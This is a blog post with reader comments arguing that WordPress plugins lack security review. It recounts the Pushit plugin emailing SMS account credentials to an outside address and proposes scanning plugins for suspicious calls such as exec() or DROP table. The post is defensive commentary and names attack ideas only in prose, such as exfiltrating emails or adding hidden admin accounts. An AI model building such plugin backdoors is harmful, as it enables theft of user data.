The Fear of WordPress Plugins
There’s been a nagging thought in the back of my head ever since I started writing WordPress plugins; the apparent lack of oversight in the WordPress plugin distribution system. I’m not trying to create hype around anything, I really do like WordPress, but I’m worried about the implications of zero oversight.
Lack of Oversight
It would be trivially simple to add an algorithm to a plugin to do all sorts of nefarious things. Off the top of my head I can imagine the following:
- Send over a blogs comment data (email addresses) to an external server.
- Add an admin account or change existing password
- Hell, even deleting the entire database and files
Not a happy thought is it?
Attempting such a thing from a new plugin, with zero initial interest, would be nearly impossible because of the noise from all the other plugins. I say nearly impossible because there was recently a case of a plugin, called Pushit, which sent an email containing passwords to a gmail account upon execution. I first heard about this from a post on Mental Fruition asking the question “Are your WordPress plugins safe?“.
In doing some research on connecting WordPress to SMS gateways for some mobile action, I found what is either a careless remnant of testing or a malicious attempt to steal data from people using a WordPress plugin. Actually, make that carelessly malicious.
Interested in how the Pushit plugin for WordPress was working behind the scenes, I stumbled upon quite a shocker:
…Yet towards the end of this send function, there’s a call to PHP’s mail function. It sends the following to smart.maxx@gmail.com:
- receiving number
- message sent
- username of SMS service account
- password of SMS service account
- the short number used
- the sender name/number to be displayed on the receiving mobile
- whether the SMS was sent OK
Apparently the authors of this plugin deem that this information is something that someone with the e-mail address smart.maxx@gmail.com should have about every SMS you, or your visitors, attempt to send using their plugin. Are you cool with that?
No, I’m not cool with that and I don’t know anyone who would be cool with that.
Thankfully, the Pushit plugin was only downloaded around 200 times before the issue was discovered. It should be noted that the developer of the plugin swears that it was an honest mistake; the mail() call was leftover code from testing apparently. This doesn’t invalidate the fear though.
No, the fear is from an existing, popular, plugin being compromised and distributed. This is the nightmare scenario.
Take wp-click-track (my most popular plugin) for example. To date, it’s been downloaded a couple thousand times and it’s been written up on a few sites. Were I evil, and my girlfriend says the juries still out on that 
, I could easily compromise quite a few sites with a simple update. Quite the scary thought isn’t it?
I know it would be nearly impossible to protect WordPress from malicious code because plugins are written in php and, because of that, have access to all the resources WordPress does. PHP can’t be sandboxed so manual screening would be pretty much required.
The fact that there isn’t any manual screening to date is surprising though. WordPress is owned by Automattic, which has received at least 29.9 million dollars in funding so they have money. Just look at it: $29,900,000. That’s a lot of money so it’s pretty tough to understand the argument, if it was used, that there just isn’t money available for a person to provide manual oversight.
That is inexcusable.
I’m not saying it would be easy by any means, but if a company has 29, fucking, million dollars based on the back of a shoddy system there’s no reason why they couldn’t spend some money adding oversight to the plugin system.
As mentioned above, since WordPress plugins are written in raw php they have full access to all the functionality WordPress does so solving this issue programmatically would be nearly impossible. No, without using some sort of meta language, similar to Smarty, manual oversight is probably the only solution.
At the very least take 2-4 programmers, or, hell, one really talented programmer, and have them write a couple scripts to parse the plugin svn repository looking for suspicious function calls (rm(), mail(), exec(), etc) and algorithms (DROP table) and have the programmer intervene manually if anything suspicious is detected.
Heal thyself WordPress. Now.
Email
Twitter
I agree, WordPress should implement stricter security in relation to plugins. In fact, WordPress 2.8.1 supposedly does add a bit more security, although I have no idea what changed, except that now one of my plugins requires I select and enable option every time it updates, but I’m not sure if that’s related.
One thing WordPress could do, if they aren’t already, is implement a system like Apple have for iPhone apps, where they inspect any new or updated code. If WordPress “distribute” plugins they should take a bit more responsibility for their content.
You’ve definitely made me think. I’m going to have to go through the code for all my plugins now, and I use a lot.
Really what scares me most is, what if someone hacked a plugin creator’s WordPress.org account and sent out a malicious update for a well used plugin?
Amazingly, I had the exact same fear about my account being compromised but I thought it might be a bit… much to add that in the post. Thanks for bringing it up because it most certainly deserves to be thought about
1. This all applies to desktop software as well. Should Apple or Microsoft have to review and approve software before it can be distributed to users?
2. Would you rather have this minor risk, or would you rather have WordPress Extend become something like the iPhone App Store?
3. This is just further reason for people to move towards “premium” plugins. Pay for your plugins and you won’t have the problem. The software will be better maintained, and the developers wouldn’t have the temptation to add in malware.
Hi redwall_hp (a pseudonym?),
1. I guess it could apply to desktop software but you’ve got to admit it’s quite the leap we’re making. Kudos on making the connection with what I was saying: there should be some oversight of WordPress plugins to: all software should have oversight.
2. You ask that like those are the only two options (plus I disagree with this being a minor risk). Instead, what about how Google handles the Android store? Google handles the review process post-hoc so there is no cluster fuck like the iPhone.
3. Wow. Um, no, I don’t think paying for the plugins is the answer either. I write two free plugins without making a cent and I believe they are both very well maintained and I have never, ever, had the urge to add in malware.
No disrespect, but I notice you’re a WP plugin developer. Are you saying your plugins aren’t maintained and you’ve put malware in? I bet the answer is an emphatic NO OF COURSE NOT (along with an appropriate amount of insults I’d wager). The point is that I don’t think there’s any more “honor” or desire for quality for so called premium plugins (McDonalds charges but it’s a far cry from even a basic definition of “good” for example).
At this point I’m really thinking the bare minimum answer is a little bot to parse the plugins looking for “suspicious” strings or function calls. Or something similar; I have faith that Automattic are smart people and can figure it out if they wanted to. I just don’t think they do.
Yes, it’s a pseudonym. It would be a rather odd name.
1 & 2. I think that they should be able to roll back the published version of a plugin in the repo if a patch contains actual malware. (After the fact though, I don’t want any pre-release approval for each update like with the iPhone.) I think that should be the extent of it though. But on the other hand, I don’t really think it’s necessarily their responsibility. I still say that falls upon the end user. If you download malware, it’s kinda your fault. (The same goes for anyone who installs malware on their computer because a site said they needed to install a bogus ActiveX control.)
3. [Insert "emphatic NO OF COURSE NOT" and insults here] I actually haven’t been doing a whole lot of active development on the plugins at the moment, aside from working on bug fixes and making sure everything works with new releases of WordPress. I’m planning to eventually scrap and rewrite a couple of them and make them paid (but GPL still). Why? Because I can’t take the support anymore. I’ve pretty much stopped checking my support inbox now. I can’t spend hours helping people for nothing. I get an occasional small donation, but the ratio isn’t very good. (And I certainly shouldn’t have to put up with people *demanding* that I help them style something so it works better with their theme, and sending multiple emails because I didn’t respond within the hour.) Too much work, stress, and headache.
Charging a modest sum in some manner (whether it be paying for the plugin itself, for support, or something else) should help cut down on that kind of crap and allow me to actually put time into developing the plugin, and helping people who care enough to support the development. There are a few developers, such as Gravity Forms, who are doing something along similar lines now, and it’s working well for them.
It works like this: Provide an awesome product (and be trustworthy) and people will pay. If you don’t deliver, then people won’t pay. You can’t have better motivation than that.
I don’t quite buy the McDonalds metaphor though. McDonalds may not be the best food, but the alternative “better food” certainly isn’t free. McDonalds is closer to the free end of the spectrum than a restaurant with better food…
Odd name? Or the Best. Name. Ever. Like a D&D character. Redwall. Have to drop the HP though
1&2: That’s not a bad idea man; no idea how to get Automattic to implement it in WordPress but still a good idea. Maybe a plugin scanner / profiler would make for a good security plugin? Might make a good premium plugin.
I realize there’s technically no legal responsibility for Automattic to do anything about this issue but I do believe there’s a moral responsibility (which I know is a weak, weak, argument). Automattic built a system that allows third party developers to have their code installed with the click of a link if that code is hosted by Automattic / WordPress.
I’m not talking about all plugins here; those that are downloaded from a separate site are used at the users risk (though the plugin author is still responsible for any repercussions whether they own up to it or not). This may seem a bit of a double standard, and honestly, I accept that it probably is, but Automattic is a multi-million dollar organization that puts out the code millions of people rely on. It seems to me that there is a “trust” imbued by the plugins that come from Automattic that they are approved by WordPress. It hardly seems appropriate for Automattic to do nothing to protect their users from the very plugin eco system they themselves created and profit from.
Wah Wah!! I know. Sigh…
3. Dude, I feel your pain on the constant requests. At least 10 times a month I get emails from users demanding my help on their project. It. Does. Get. Old.
I do try and help those users that have a new issue (something not covered in the docs or a previous comment) but, honestly, my plugins just aren’t that popular (5,000 downloads or something like that).
I definitely believe there is a market for some premium plugins; I just don’t think lack of quality was one of them. Some plugins are so complicated and useful that to not get paid wouldn’t be cool. To be honest, I wish I would have gone the premium route for wp-click-track. So much work goes into it to make it better and better and better (which I think I’ve done from 0.1 to the current 0.6) that I would be way more motivated and productive if there was cash involved
I would be careful about charging for anything that has a GPL license on it. The way I understand the GPL (please correct me if you know better) is that with the GPL license anyone who purchased the code can then release it for free under a different name so long as the code continues to be released. I like GPL just not for $$ projects.
Yup, the McDonalds metaphor wasn’t good or even applicable. Just a weak metaphor. Let us never speak of it again.
Outstanding post. I never even thought of this. I encourage people to keep plugins down to a minimum for possible conflicting plugins, but it never crossed my mind that some “evil” person could really do some serious damage.
And yes, with that kind of cash rolling in there is no excuse for not having some sort of oversight. You just gave me a post subject, and I will most certainly include links to your post, and the posts that you included in your article. Thanks again for the heads up. “-)
Side note: I found your site on the blogging sub-Reddit.
Hi Chuck,
Thanks for the props man; I’m glad you found this topic worthwhile enough to write about.
My biggest issue with Automattic not doing anything about this is that it’s such an easy to reach, low hanging, fruit for a company with the level of funding they have. Hopefully they’ll do something about this, but my experience tells me they won’t.
Thanks again
Eric
Arrived here via Twitter link from Chuck, above.
I always thought the same potential for malice exists with Twitter apps. People willing give up their Twitter password to “get more followers” or “manage their followers” or to “tweet your buddy a beer” but does anyone ever stop to think about what these apps could be doing?
There’s no way to guage or prove it but I would venture to say that AT LEAST 30% of Twitters have the same password on Twitter as they do for Facebook and perhaps even for their main Email address. Once a hacker has one valid password (plus all your demographic data scraped from Facebook and other social apps) they can much more easily start hacking all your other accounts as well…
So, to the consumers of FREE I say…”Buyer Beware!”
- Don
Hi @donpower,
I agree completely about sharing passwords with any online service; don’t. Ever. A few years ago this was a rampant issue, with all sorts of sites being bold enough to ask. Now some sites do still process account joining (is that the right term?) through their own servers but thanks to tools like Oauth it’s become less and less of a commonality. Personally, I do use Oauth for a few Twitter integration projects I use but that’s because it’s, mostly, obvious that I’m not sharing the info with anyone.
That being said I am extremely disturbed whenever a site asks me for my email acccount info like LinkedIn does (whereby they grab my contact list). I Just. Don’t. Trust. Them.
Thanks for stopping by; ironically I enjoy your blog so I’m glad I could reciprocate
Eric
Yah – reciprocity is neat. I got your comment on my blog too – thx!
See you around the posts, Eric!
- Don